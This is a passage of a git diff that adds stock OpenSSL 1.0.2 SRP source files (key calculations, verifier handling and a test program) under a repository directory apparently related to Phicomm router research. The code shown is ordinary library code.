+BIGNUM *SRP_Calc_u(BIGNUM *A, BIGNUM *B, BIGNUM *N)
+{
+    /* k = SHA1(PAD(A) || PAD(B) ) -- tls-srp draft 8 */
+
+    BIGNUM *u;
+    unsigned char cu[SHA_DIGEST_LENGTH];
+    unsigned char *cAB;
+    EVP_MD_CTX ctxt;
+    int longN;
+    if ((A == NULL) || (B == NULL) || (N == NULL))
+        return NULL;
+
+    if (BN_ucmp(A, N) >= 0 || BN_ucmp(B, N) >= 0)
+        return NULL;
+
+    longN = BN_num_bytes(N);
+
+    if ((cAB = OPENSSL_malloc(2 * longN)) == NULL)
+        return NULL;
+
+    memset(cAB, 0, longN);
+
+    EVP_MD_CTX_init(&ctxt);
+    EVP_DigestInit_ex(&ctxt, EVP_sha1(), NULL);
+    EVP_DigestUpdate(&ctxt, cAB + BN_bn2bin(A, cAB + longN), longN);
+    EVP_DigestUpdate(&ctxt, cAB + BN_bn2bin(B, cAB + longN), longN);
+    OPENSSL_free(cAB);
+    EVP_DigestFinal_ex(&ctxt, cu, NULL);
+    EVP_MD_CTX_cleanup(&ctxt);
+
+    if (!(u = BN_bin2bn(cu, sizeof(cu), NULL)))
+        return NULL;
+    if (!BN_is_zero(u))
+        return u;
+    BN_free(u);
+    return NULL;
+}
+
+BIGNUM *SRP_Calc_server_key(BIGNUM *A, BIGNUM *v, BIGNUM *u, BIGNUM *b,
+                            BIGNUM *N)
+{
+    BIGNUM *tmp = NULL, *S = NULL;
+    BN_CTX *bn_ctx;
+
+    if (u == NULL || A == NULL || v == NULL || b == NULL || N == NULL)
+        return NULL;
+
+    if ((bn_ctx = BN_CTX_new()) == NULL ||
+        (tmp = BN_new()) == NULL || (S = BN_new()) == NULL)
+        goto err;
+
+    /* S = (A*v**u) ** b */
+
+    if (!BN_mod_exp(tmp, v, u, N, bn_ctx))
+        goto err;
+    if (!BN_mod_mul(tmp, A, tmp, N, bn_ctx))
+        goto err;
+    if (!BN_mod_exp(S, tmp, b, N, bn_ctx))
+        goto err;
+ err:
+    BN_CTX_free(bn_ctx);
+    BN_clear_free(tmp);
+    return S;
+}
+
+BIGNUM *SRP_Calc_B(BIGNUM *b, BIGNUM *N, BIGNUM *g, BIGNUM *v)
+{
+    BIGNUM *kv = NULL, *gb = NULL;
+    BIGNUM *B = NULL, *k = NULL;
+    BN_CTX *bn_ctx;
+
+    if (b == NULL || N == NULL || g == NULL || v == NULL ||
+        (bn_ctx = BN_CTX_new()) == NULL)
+        return NULL;
+
+    if ((kv = BN_new()) == NULL ||
+        (gb = BN_new()) == NULL || (B = BN_new()) == NULL)
+        goto err;
+
+    /* B = g**b + k*v */
+
+    if (!BN_mod_exp(gb, g, b, N, bn_ctx) ||
+        !(k = srp_Calc_k(N, g)) ||
+        !BN_mod_mul(kv, v, k, N, bn_ctx) ||
+        !BN_mod_add(B, gb, kv, N, bn_ctx)) {
+        BN_free(B);
+        B = NULL;
+    }
+ err:
+    BN_CTX_free(bn_ctx);
+    BN_clear_free(kv);
+    BN_clear_free(gb);
+    BN_free(k);
+    return B;
+}
+
+BIGNUM *SRP_Calc_x(BIGNUM *s, const char *user, const char *pass)
+{
+    unsigned char dig[SHA_DIGEST_LENGTH];
+    EVP_MD_CTX ctxt;
+    unsigned char *cs;
+
+    if ((s == NULL) || (user == NULL) || (pass == NULL))
+        return NULL;
+
+    if ((cs = OPENSSL_malloc(BN_num_bytes(s))) == NULL)
+        return NULL;
+
+    EVP_MD_CTX_init(&ctxt);
+    EVP_DigestInit_ex(&ctxt, EVP_sha1(), NULL);
+    EVP_DigestUpdate(&ctxt, user, strlen(user));
+    EVP_DigestUpdate(&ctxt, ":", 1);
+    EVP_DigestUpdate(&ctxt, pass, strlen(pass));
+    EVP_DigestFinal_ex(&ctxt, dig, NULL);
+
+    EVP_DigestInit_ex(&ctxt, EVP_sha1(), NULL);
+    BN_bn2bin(s, cs);
+    EVP_DigestUpdate(&ctxt, cs, BN_num_bytes(s));
+    OPENSSL_free(cs);
+    EVP_DigestUpdate(&ctxt, dig, sizeof(dig));
+    EVP_DigestFinal_ex(&ctxt, dig, NULL);
+    EVP_MD_CTX_cleanup(&ctxt);
+
+    return BN_bin2bn(dig, sizeof(dig), NULL);
+}
+
+BIGNUM *SRP_Calc_A(BIGNUM *a, BIGNUM *N, BIGNUM *g)
+{
+    BN_CTX *bn_ctx;
+    BIGNUM *A = NULL;
+
+    if (a == NULL || N == NULL || g == NULL ||
+        (bn_ctx = BN_CTX_new()) == NULL)
+        return NULL;
+
+    if ((A = BN_new()) != NULL && !BN_mod_exp(A, g, a, N, bn_ctx)) {
+        BN_free(A);
+        A = NULL;
+    }
+    BN_CTX_free(bn_ctx);
+    return A;
+}
+
+BIGNUM *SRP_Calc_client_key(BIGNUM *N, BIGNUM *B, BIGNUM *g, BIGNUM *x,
+                            BIGNUM *a, BIGNUM *u)
+{
+    BIGNUM *tmp = NULL, *tmp2 = NULL, *tmp3 = NULL, *k = NULL, *K = NULL;
+    BN_CTX *bn_ctx;
+
+    if (u == NULL || B == NULL || N == NULL || g == NULL || x == NULL
+        || a == NULL || (bn_ctx = BN_CTX_new()) == NULL)
+        return NULL;
+
+    if ((tmp = BN_new()) == NULL ||
+        (tmp2 = BN_new()) == NULL ||
+        (tmp3 = BN_new()) == NULL || (K = BN_new()) == NULL)
+        goto err;
+
+    if (!BN_mod_exp(tmp, g, x, N, bn_ctx))
+        goto err;
+    if (!(k = srp_Calc_k(N, g)))
+        goto err;
+    if (!BN_mod_mul(tmp2, tmp, k, N, bn_ctx))
+        goto err;
+    if (!BN_mod_sub(tmp, B, tmp2, N, bn_ctx))
+        goto err;
+
+    if (!BN_mod_mul(tmp3, u, x, N, bn_ctx))
+        goto err;
+    if (!BN_mod_add(tmp2, a, tmp3, N, bn_ctx))
+        goto err;
+    if (!BN_mod_exp(K, tmp, tmp2, N, bn_ctx))
+        goto err;
+
+ err:
+    BN_CTX_free(bn_ctx);
+    BN_clear_free(tmp);
+    BN_clear_free(tmp2);
+    BN_clear_free(tmp3);
+    BN_free(k);
+    return K;
+}
+
+int SRP_Verify_B_mod_N(BIGNUM *B, BIGNUM *N)
+{
+    BIGNUM *r;
+    BN_CTX *bn_ctx;
+    int ret = 0;
+
+    if (B == NULL || N == NULL || (bn_ctx = BN_CTX_new()) == NULL)
+        return 0;
+
+    if ((r = BN_new()) == NULL)
+        goto err;
+    /* Checks if B % N == 0 */
+    if (!BN_nnmod(r, B, N, bn_ctx))
+        goto err;
+    ret = !BN_is_zero(r);
+ err:
+    BN_CTX_free(bn_ctx);
+    BN_free(r);
+    return ret;
+}
+
+int SRP_Verify_A_mod_N(BIGNUM *A, BIGNUM *N)
+{
+    /* Checks if A % N == 0 */
+    return SRP_Verify_B_mod_N(A, N);
+}
+
+/*
+ * Check if G and N are kwown parameters. The values have been generated
+ * from the ietf-tls-srp draft version 8
+ */
+char *SRP_check_known_gN_param(BIGNUM *g, BIGNUM *N)
+{
+    size_t i;
+    if ((g == NULL) || (N == NULL))
+        return 0;
+
+    srp_bn_print(g);
+    srp_bn_print(N);
+
+    for (i = 0; i < KNOWN_GN_NUMBER; i++) {
+        if (BN_cmp(knowngN[i].g, g) == 0 && BN_cmp(knowngN[i].N, N) == 0)
+            return knowngN[i].id;
+    }
+    return NULL;
+}
+
+SRP_gN *SRP_get_default_gN(const char *id)
+{
+    size_t i;
+
+    if (id == NULL)
+        return knowngN;
+    for (i = 0; i < KNOWN_GN_NUMBER; i++) {
+        if (strcmp(knowngN[i].id, id) == 0)
+            return knowngN + i;
+    }
+    return NULL;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_vfy.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_vfy.c
new file mode 100644
index 0000000..701b5cd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_vfy.c
@@ -0,0 +1,639 @@
+/* crypto/srp/srp_vfy.c */
+/*
+ * Written by Christophe Renou (christophe.renou@edelweb.fr) with the
+ * precious help of Peter Sylvester (peter.sylvester@edelweb.fr) for the
+ * EdelKey project and contributed to the OpenSSL project 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#ifndef OPENSSL_NO_SRP
+# include "cryptlib.h"
+# include "srp_lcl.h"
+# include <openssl/srp.h>
+# include <openssl/evp.h>
+# include <openssl/buffer.h>
+# include <openssl/rand.h>
+# include <openssl/txt_db.h>
+
+# define SRP_RANDOM_SALT_LEN 20
+# define MAX_LEN 2500
+
+static char b64table[] =
+    "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./";
+
+/*
+ * the following two conversion routines have been inspired by code from
+ * Stanford
+ */
+
+/*
+ * Convert a base64 string into raw byte array representation.
+ */
+static int t_fromb64(unsigned char *a, const char *src)
+{
+    char *loc;
+    int i, j;
+    int size;
+
+    while (*src && (*src == ' ' || *src == '\t' || *src == '\n'))
+        ++src;
+    size = strlen(src);
+    i = 0;
+    while (i < size) {
+        loc = strchr(b64table, src[i]);
+        if (loc == (char *)0)
+            break;
+        else
+            a[i] = loc - b64table;
+        ++i;
+    }
+    /* if nothing valid to process we have a zero length response */
+    if (i == 0)
+        return 0;
+    size = i;
+    i = size - 1;
+    j = size;
+    while (1) {
+        a[j] = a[i];
+        if (--i < 0)
+            break;
+        a[j] |= (a[i] & 3) << 6;
+        --j;
+        a[j] = (unsigned char)((a[i] & 0x3c) >> 2);
+        if (--i < 0)
+            break;
+        a[j] |= (a[i] & 0xf) << 4;
+        --j;
+        a[j] = (unsigned char)((a[i] & 0x30) >> 4);
+        if (--i < 0)
+            break;
+        a[j] |= (a[i] << 2);
+
+        a[--j] = 0;
+        if (--i < 0)
+            break;
+    }
+    while (a[j] == 0 && j <= size)
+        ++j;
+    i = 0;
+    while (j <= size)
+        a[i++] = a[j++];
+    return i;
+}
+
+/*
+ * Convert a raw byte string into a null-terminated base64 ASCII string.
+ */
+static char *t_tob64(char *dst, const unsigned char *src, int size)
+{
+    int c, pos = size % 3;
+    unsigned char b0 = 0, b1 = 0, b2 = 0, notleading = 0;
+    char *olddst = dst;
+
+    switch (pos) {
+    case 1:
+        b2 = src[0];
+        break;
+    case 2:
+        b1 = src[0];
+        b2 = src[1];
+        break;
+    }
+
+    while (1) {
+        c = (b0 & 0xfc) >> 2;
+        if (notleading || c != 0) {
+            *dst++ = b64table[c];
+            notleading = 1;
+        }
+        c = ((b0 & 3) << 4) | ((b1 & 0xf0) >> 4);
+        if (notleading || c != 0) {
+            *dst++ = b64table[c];
+            notleading = 1;
+        }
+        c = ((b1 & 0xf) << 2) | ((b2 & 0xc0) >> 6);
+        if (notleading || c != 0) {
+            *dst++ = b64table[c];
+            notleading = 1;
+        }
+        c = b2 & 0x3f;
+        if (notleading || c != 0) {
+            *dst++ = b64table[c];
+            notleading = 1;
+        }
+        if (pos >= size)
+            break;
+        else {
+            b0 = src[pos++];
+            b1 = src[pos++];
+            b2 = src[pos++];
+        }
+    }
+
+    *dst++ = '\0';
+    return olddst;
+}
+
+static void SRP_user_pwd_free(SRP_user_pwd *user_pwd)
+{
+    if (user_pwd == NULL)
+        return;
+    BN_free(user_pwd->s);
+    BN_clear_free(user_pwd->v);
+    OPENSSL_free(user_pwd->id);
+    OPENSSL_free(user_pwd->info);
+    OPENSSL_free(user_pwd);
+}
+
+static SRP_user_pwd *SRP_user_pwd_new()
+{
+    SRP_user_pwd *ret = OPENSSL_malloc(sizeof(SRP_user_pwd));
+    if (ret == NULL)
+        return NULL;
+    ret->N = NULL;
+    ret->g = NULL;
+    ret->s = NULL;
+    ret->v = NULL;
+    ret->id = NULL;
+    ret->info = NULL;
+    return ret;
+}
+
+static void SRP_user_pwd_set_gN(SRP_user_pwd *vinfo, const BIGNUM *g,
+                                const BIGNUM *N)
+{
+    vinfo->N = N;
+    vinfo->g = g;
+}
+
+static int SRP_user_pwd_set_ids(SRP_user_pwd *vinfo, const char *id,
+                                const char *info)
+{
+    if (id != NULL && NULL == (vinfo->id = BUF_strdup(id)))
+        return 0;
+    return (info == NULL || NULL != (vinfo->info = BUF_strdup(info)));
+}
+
+static int SRP_user_pwd_set_sv(SRP_user_pwd *vinfo, const char *s,
+                               const char *v)
+{
+    unsigned char tmp[MAX_LEN];
+    int len;
+
+    if (strlen(s) > MAX_LEN || strlen(v) > MAX_LEN)
+        return 0;
+    len = t_fromb64(tmp, v);
+    if (NULL == (vinfo->v = BN_bin2bn(tmp, len, NULL)))
+        return 0;
+    len = t_fromb64(tmp, s);
+    return ((vinfo->s = BN_bin2bn(tmp, len, NULL)) != NULL);
+}
+
+static int SRP_user_pwd_set_sv_BN(SRP_user_pwd *vinfo, BIGNUM *s, BIGNUM *v)
+{
+    vinfo->v = v;
+    vinfo->s = s;
+    return (vinfo->s != NULL && vinfo->v != NULL);
+}
+
+SRP_VBASE *SRP_VBASE_new(char *seed_key)
+{
+    SRP_VBASE *vb = (SRP_VBASE *)OPENSSL_malloc(sizeof(SRP_VBASE));
+
+    if (vb == NULL)
+        return NULL;
+    if (!(vb->users_pwd = sk_SRP_user_pwd_new_null()) ||
+        !(vb->gN_cache = sk_SRP_gN_cache_new_null())) {
+        OPENSSL_free(vb);
+        return NULL;
+    }
+    vb->default_g = NULL;
+    vb->default_N = NULL;
+    vb->seed_key = NULL;
+    if ((seed_key != NULL) && (vb->seed_key = BUF_strdup(seed_key)) == NULL) {
+        sk_SRP_user_pwd_free(vb->users_pwd);
+        sk_SRP_gN_cache_free(vb->gN_cache);
+        OPENSSL_free(vb);
+        return NULL;
+    }
+    return vb;
+}
+
+int SRP_VBASE_free(SRP_VBASE *vb)
+{
+    sk_SRP_user_pwd_pop_free(vb->users_pwd, SRP_user_pwd_free);
+    sk_SRP_gN_cache_free(vb->gN_cache);
+    OPENSSL_free(vb->seed_key);
+    OPENSSL_free(vb);
+    return 0;
+}
+
+static SRP_gN_cache *SRP_gN_new_init(const char *ch)
+{
+    unsigned char tmp[MAX_LEN];
+    int len;
+
+    SRP_gN_cache *newgN =
+        (SRP_gN_cache *)OPENSSL_malloc(sizeof(SRP_gN_cache));
+    if (newgN == NULL)
+        return NULL;
+
+    if ((newgN->b64_bn = BUF_strdup(ch)) == NULL)
+        goto err;
+
+    len = t_fromb64(tmp, ch);
+    if ((newgN->bn = BN_bin2bn(tmp, len, NULL)))
+        return newgN;
+
+    OPENSSL_free(newgN->b64_bn);
+ err:
+    OPENSSL_free(newgN);
+    return NULL;
+}
+
+static void SRP_gN_free(SRP_gN_cache *gN_cache)
+{
+    if (gN_cache == NULL)
+        return;
+    OPENSSL_free(gN_cache->b64_bn);
+    BN_free(gN_cache->bn);
+    OPENSSL_free(gN_cache);
+}
+
+static SRP_gN *SRP_get_gN_by_id(const char *id, STACK_OF(SRP_gN) *gN_tab)
+{
+    int i;
+
+    SRP_gN *gN;
+    if (gN_tab != NULL)
+        for (i = 0; i < sk_SRP_gN_num(gN_tab); i++) {
+            gN = sk_SRP_gN_value(gN_tab, i);
+            if (gN && (id == NULL || strcmp(gN->id, id) == 0))
+                return gN;
+        }
+
+    return SRP_get_default_gN(id);
+}
+
+static BIGNUM *SRP_gN_place_bn(STACK_OF(SRP_gN_cache) *gN_cache, char *ch)
+{
+    int i;
+    if (gN_cache == NULL)
+        return NULL;
+
+    /* search if we have already one... */
+    for (i = 0; i < sk_SRP_gN_cache_num(gN_cache); i++) {
+        SRP_gN_cache *cache = sk_SRP_gN_cache_value(gN_cache, i);
+        if (strcmp(cache->b64_bn, ch) == 0)
+            return cache->bn;
+    }
+    {                           /* it is the first time that we find it */
+        SRP_gN_cache *newgN = SRP_gN_new_init(ch);
+        if (newgN) {
+            if (sk_SRP_gN_cache_insert(gN_cache, newgN, 0) > 0)
+                return newgN->bn;
+            SRP_gN_free(newgN);
+        }
+    }
+    return NULL;
+}
+
+/*
+ * this function parses verifier file. Format is:
+ * string(index):base64(N):base64(g):0
+ * string(username):base64(v):base64(salt):int(index)
+ */
+
+int SRP_VBASE_init(SRP_VBASE *vb, char *verifier_file)
+{
+    int error_code;
+    STACK_OF(SRP_gN) *SRP_gN_tab = sk_SRP_gN_new_null();
+    char *last_index = NULL;
+    int i;
+    char **pp;
+
+    SRP_gN *gN = NULL;
+    SRP_user_pwd *user_pwd = NULL;
+
+    TXT_DB *tmpdb = NULL;
+    BIO *in = BIO_new(BIO_s_file());
+
+    error_code = SRP_ERR_OPEN_FILE;
+
+    if (in == NULL || BIO_read_filename(in, verifier_file) <= 0)
+        goto err;
+
+    error_code = SRP_ERR_VBASE_INCOMPLETE_FILE;
+
+    if ((tmpdb = TXT_DB_read(in, DB_NUMBER)) == NULL)
+        goto err;
+
+    error_code = SRP_ERR_MEMORY;
+
+    if (vb->seed_key) {
+        last_index = SRP_get_default_gN(NULL)->id;
+    }
+    for (i = 0; i < sk_OPENSSL_PSTRING_num(tmpdb->data); i++) {
+        pp = sk_OPENSSL_PSTRING_value(tmpdb->data, i);
+        if (pp[DB_srptype][0] == DB_SRP_INDEX) {
+            /*
+             * we add this couple in the internal Stack
+             */
+
+            if ((gN = (SRP_gN *) OPENSSL_malloc(sizeof(SRP_gN))) == NULL)
+                goto err;
+
+            if (!(gN->id = BUF_strdup(pp[DB_srpid]))
+                || !(gN->N =
+                     SRP_gN_place_bn(vb->gN_cache, pp[DB_srpverifier]))
+                || !(gN->g = SRP_gN_place_bn(vb->gN_cache, pp[DB_srpsalt]))
+                || sk_SRP_gN_insert(SRP_gN_tab, gN, 0) == 0)
+                goto err;
+
+            gN = NULL;
+
+            if (vb->seed_key != NULL) {
+                last_index = pp[DB_srpid];
+            }
+        } else if (pp[DB_srptype][0] == DB_SRP_VALID) {
+            /* it is a user .... */
+            SRP_gN *lgN;
+            if ((lgN = SRP_get_gN_by_id(pp[DB_srpgN], SRP_gN_tab)) != NULL) {
+                error_code = SRP_ERR_MEMORY;
+                if ((user_pwd = SRP_user_pwd_new()) == NULL)
+                    goto err;
+
+                SRP_user_pwd_set_gN(user_pwd, lgN->g, lgN->N);
+                if (!SRP_user_pwd_set_ids
+                    (user_pwd, pp[DB_srpid], pp[DB_srpinfo]))
+                    goto err;
+
+                error_code = SRP_ERR_VBASE_BN_LIB;
+                if (!SRP_user_pwd_set_sv
+                    (user_pwd, pp[DB_srpsalt], pp[DB_srpverifier]))
+                    goto err;
+
+                if (sk_SRP_user_pwd_insert(vb->users_pwd, user_pwd, 0) == 0)
+                    goto err;
+                user_pwd = NULL; /* abandon responsability */
+            }
+        }
+    }
+
+    if (last_index != NULL) {
+        /* this means that we want to simulate a default user */
+
+        if (((gN = SRP_get_gN_by_id(last_index, SRP_gN_tab)) == NULL)) {
+            error_code = SRP_ERR_VBASE_BN_LIB;
+            goto err;
+        }
+        vb->default_g = gN->g;
+        vb->default_N = gN->N;
+        gN = NULL;
+    }
+    error_code = SRP_NO_ERROR;
+
+ err:
+    /*
+     * there may be still some leaks to fix, if this fails, the application
+     * terminates most likely
+     */
+
+    if (gN != NULL) {
+        OPENSSL_free(gN->id);
+        OPENSSL_free(gN);
+    }
+
+    SRP_user_pwd_free(user_pwd);
+
+    if (tmpdb)
+        TXT_DB_free(tmpdb);
+    if (in)
+        BIO_free_all(in);
+
+    sk_SRP_gN_free(SRP_gN_tab);
+
+    return error_code;
+
+}
+
+SRP_user_pwd *SRP_VBASE_get_by_user(SRP_VBASE *vb, char *username)
+{
+    int i;
+    SRP_user_pwd *user;
+    unsigned char digv[SHA_DIGEST_LENGTH];
+    unsigned char digs[SHA_DIGEST_LENGTH];
+    EVP_MD_CTX ctxt;
+
+    if (vb == NULL)
+        return NULL;
+    for (i = 0; i < sk_SRP_user_pwd_num(vb->users_pwd); i++) {
+        user = sk_SRP_user_pwd_value(vb->users_pwd, i);
+        if (strcmp(user->id, username) == 0)
+            return user;
+    }
+    if ((vb->seed_key == NULL) ||
+        (vb->default_g == NULL) || (vb->default_N == NULL))
+        return NULL;
+
+/* if the user is unknown we set parameters as well if we have a seed_key */
+
+    if ((user = SRP_user_pwd_new()) == NULL)
+        return NULL;
+
+    SRP_user_pwd_set_gN(user, vb->default_g, vb->default_N);
+
+    if (!SRP_user_pwd_set_ids(user, username, NULL))
+        goto err;
+
+    RAND_pseudo_bytes(digv, SHA_DIGEST_LENGTH);
+    EVP_MD_CTX_init(&ctxt);
+    EVP_DigestInit_ex(&ctxt, EVP_sha1(), NULL);
+    EVP_DigestUpdate(&ctxt, vb->seed_key, strlen(vb->seed_key));
+    EVP_DigestUpdate(&ctxt, username, strlen(username));
+    EVP_DigestFinal_ex(&ctxt, digs, NULL);
+    EVP_MD_CTX_cleanup(&ctxt);
+    if (SRP_user_pwd_set_sv_BN
+        (user, BN_bin2bn(digs, SHA_DIGEST_LENGTH, NULL),
+         BN_bin2bn(digv, SHA_DIGEST_LENGTH, NULL)))
+        return user;
+
+ err:SRP_user_pwd_free(user);
+    return NULL;
+}
+
+/*
+ * create a verifier (*salt,*verifier,g and N are in base64)
+ */
+char *SRP_create_verifier(const char *user, const char *pass, char **salt,
+                          char **verifier, const char *N, const char *g)
+{
+    int len;
+    char *result = NULL;
+    char *vf;
+    BIGNUM *N_bn = NULL, *g_bn = NULL, *s = NULL, *v = NULL;
+    unsigned char tmp[MAX_LEN];
+    unsigned char tmp2[MAX_LEN];
+    char *defgNid = NULL;
+
+    if ((user == NULL) ||
+        (pass == NULL) || (salt == NULL) || (verifier == NULL))
+        goto err;
+
+    if (N) {
+        if (!(len = t_fromb64(tmp, N)))
+            goto err;
+        N_bn = BN_bin2bn(tmp, len, NULL);
+        if (!(len = t_fromb64(tmp, g)))
+            goto err;
+        g_bn = BN_bin2bn(tmp, len, NULL);
+        defgNid = "*";
+    } else {
+        SRP_gN *gN = SRP_get_gN_by_id(g, NULL);
+        if (gN == NULL)
+            goto err;
+        N_bn = gN->N;
+        g_bn = gN->g;
+        defgNid = gN->id;
+    }
+
+    if (*salt == NULL) {
+        RAND_pseudo_bytes(tmp2, SRP_RANDOM_SALT_LEN);
+
+        s = BN_bin2bn(tmp2, SRP_RANDOM_SALT_LEN, NULL);
+    } else {
+        if (!(len = t_fromb64(tmp2, *salt)))
+            goto err;
+        s = BN_bin2bn(tmp2, len, NULL);
+    }
+
+    if (!SRP_create_verifier_BN(user, pass, &s, &v, N_bn, g_bn))
+        goto err;
+
+    BN_bn2bin(v, tmp);
+    if (((vf = OPENSSL_malloc(BN_num_bytes(v) * 2)) == NULL))
+        goto err;
+    t_tob64(vf, tmp, BN_num_bytes(v));
+
+    *verifier = vf;
+    if (*salt == NULL) {
+        char *tmp_salt;
+
+        if ((tmp_salt = OPENSSL_malloc(SRP_RANDOM_SALT_LEN * 2)) == NULL) {
+            OPENSSL_free(vf);
+            goto err;
+        }
+        t_tob64(tmp_salt, tmp2, SRP_RANDOM_SALT_LEN);
+        *salt = tmp_salt;
+    }
+
+    result = defgNid;
+
+ err:
+    if (N) {
+        BN_free(N_bn);
+        BN_free(g_bn);
+    }
+    return result;
+}
+
+/*
+ * create a verifier (*salt,*verifier,g and N are BIGNUMs)
+ */
+int SRP_create_verifier_BN(const char *user, const char *pass, BIGNUM **salt,
+                           BIGNUM **verifier, BIGNUM *N, BIGNUM *g)
+{
+    int result = 0;
+    BIGNUM *x = NULL;
+    BN_CTX *bn_ctx = BN_CTX_new();
+    unsigned char tmp2[MAX_LEN];
+
+    if ((user == NULL) ||
+        (pass == NULL) ||
+        (salt == NULL) ||
+        (verifier == NULL) || (N == NULL) || (g == NULL) || (bn_ctx == NULL))
+        goto err;
+
+    srp_bn_print(N);
+    srp_bn_print(g);
+
+    if (*salt == NULL) {
+        RAND_pseudo_bytes(tmp2, SRP_RANDOM_SALT_LEN);
+
+        *salt = BN_bin2bn(tmp2, SRP_RANDOM_SALT_LEN, NULL);
+    }
+
+    x = SRP_Calc_x(*salt, user, pass);
+
+    *verifier = BN_new();
+    if (*verifier == NULL)
+        goto err;
+
+    if (!BN_mod_exp(*verifier, g, x, N, bn_ctx)) {
+        BN_clear_free(*verifier);
+        goto err;
+    }
+
+    srp_bn_print(*verifier);
+
+    result = 1;
+
+ err:
+
+    BN_clear_free(x);
+    BN_CTX_free(bn_ctx);
+    return result;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srptest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srptest.c
new file mode 100644
index 0000000..451c70e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srptest.c
@@ -0,0 +1,154 @@
+#include <openssl/opensslconf.h>
+#ifdef OPENSSL_NO_SRP
+
+# include <stdio.h>
+
+int main(int argc, char *argv[])
+{
+    printf("No SRP support\n");
+    return (0);
+}
+
+#else
+
+# include <openssl/srp.h>
+# include <openssl/rand.h>
+# include <openssl/err.h>
+
+static void showbn(const char *name, const BIGNUM *bn)
+{
+    fputs(name, stdout);
+    fputs(" = ", stdout);
+    BN_print_fp(stdout, bn);
+    putc('\n', stdout);
+}
+
+# define RANDOM_SIZE 32         /* use 256 bits on each side */
+
+static int run_srp(const char *username, const char *client_pass,
+                   const char *server_pass)
+{
+    int ret = -1;
+    BIGNUM *s = NULL;
+    BIGNUM *v = NULL;
+    BIGNUM *a = NULL;
+    BIGNUM *b = NULL;
+    BIGNUM *u = NULL;
+    BIGNUM *x = NULL;
+    BIGNUM *Apub = NULL;
+    BIGNUM *Bpub = NULL;
+    BIGNUM *Kclient = NULL;
+    BIGNUM *Kserver = NULL;
+    unsigned char rand_tmp[RANDOM_SIZE];
+    /* use builtin 1024-bit params */
+    SRP_gN *GN = SRP_get_default_gN("1024");
+
+    if (GN == NULL) {
+        fprintf(stderr, "Failed to get SRP parameters\n");
+        return -1;
+    }
+    /* Set up server's password entry */
+    if (!SRP_create_verifier_BN(username, server_pass, &s, &v, GN->N, GN->g)) {
+        fprintf(stderr, "Failed to create SRP verifier\n");
+        return -1;
+    }
+
+    showbn("N", GN->N);
+    showbn("g", GN->g);
+    showbn("Salt", s);
+    showbn("Verifier", v);
+
+    /* Server random */
+    RAND_pseudo_bytes(rand_tmp, sizeof(rand_tmp));
+    b = BN_bin2bn(rand_tmp, sizeof(rand_tmp), NULL);
+    /* TODO - check b != 0 */
+    showbn("b", b);
+
+    /* Server's first message */
+    Bpub = SRP_Calc_B(b, GN->N, GN->g, v);
+    showbn("B", Bpub);
+
+    if (!SRP_Verify_B_mod_N(Bpub, GN->N)) {
+        fprintf(stderr, "Invalid B\n");
+        return -1;
+    }
+
+    /* Client random */
+    RAND_pseudo_bytes(rand_tmp, sizeof(rand_tmp));
+    a = BN_bin2bn(rand_tmp, sizeof(rand_tmp), NULL);
+    /* TODO - check a != 0 */
+    showbn("a", a);
+
+    /* Client's response */
+    Apub = SRP_Calc_A(a, GN->N, GN->g);
+    showbn("A", Apub);
+
+    if (!SRP_Verify_A_mod_N(Apub, GN->N)) {
+        fprintf(stderr, "Invalid A\n");
+        return -1;
+    }
+
+    /* Both sides calculate u */
+    u = SRP_Calc_u(Apub, Bpub, GN->N);
+
